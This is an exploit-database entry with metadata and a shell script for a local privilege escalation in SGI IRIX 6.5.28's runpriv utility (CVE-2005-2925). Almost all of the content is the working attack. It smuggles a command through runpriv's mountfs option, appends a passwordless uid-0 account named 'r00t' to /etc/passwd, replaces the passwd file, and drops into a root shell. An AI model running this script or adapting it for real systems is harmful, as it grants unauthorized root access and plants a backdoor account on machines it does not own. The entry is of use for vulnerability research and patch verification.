SGI IRIX 6.5.28 - 'runpriv' Design Error

Author: anonymous
type: local
platform: irix
port: 
date_added: 2005-10-09  
date_updated: 2017-10-10  
verified: 1  
codes: OSVDB-19907;CVE-2005-2925  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 1577.sh  

#!/bin/sh
# Advisory: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=312

/usr/sysadm/bin/runpriv mountfs -s test -d / -o |
  "ksh -c 'echo r00t::0:0:r00t:/tmp:/bin/sh >> /etc/passwd'"
su r00t -c "chown root:sys /tmp/passwd123 ;
mv /tmp/passwd123 /etc/passwd ;
chmod 644 /etc/passwd ; su"

# milw0rm.com [2005-10-10]